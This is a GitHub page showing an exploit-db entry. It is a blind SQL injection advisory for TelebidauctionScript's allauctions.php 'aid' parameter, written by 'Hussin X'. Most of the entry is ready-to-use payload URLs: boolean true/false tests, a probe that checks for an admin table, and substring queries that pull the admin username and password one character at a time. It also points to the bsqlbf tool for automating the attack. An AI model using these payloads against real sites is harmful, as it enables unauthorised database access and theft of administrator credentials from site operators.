forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy path10165.txt
More file actions
executable file
·40 lines (20 loc) · 878 Bytes
/
Copy path10165.txt
File metadata and controls
executable file
·40 lines (20 loc) · 878 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
TelebidauctionScript(aid) Blind SQL Injection Vulnerability
____________________________________
Author : Hussin X
Home : www.IQ-TY.com
email : darkangel_g85@Yahoo.com
____________________________________
Vendor : http://www.telebidauctionscript.com/
Demo :
_______
http://server/allauctions.php?aid=2+and+1=1 (true)
http://server/allauctions.php?aid=2+and+1=0 (false )
:: Table ::
http://server/allauctions.php?aid=2+and+(SELECT+1+from+admin+limit+0,1)=1
:: column pass and username ::
http://server/allauctions.php?aid=2+and+(SELECT+substring(concat(1,pass),1,1)+from+admin+limit 0,1)=1
http://server/allauctions.php?aid=2 and (SELECT+substring(concat(1,username),1,1) from admin limit 0,1)=1
note : Use the "bsqlbf" to write detailed information
Greetz
WwW.IQ-ty.CoM , Tryag.cc
| CraCkEr | Cyber-Zone | str0ke | jiko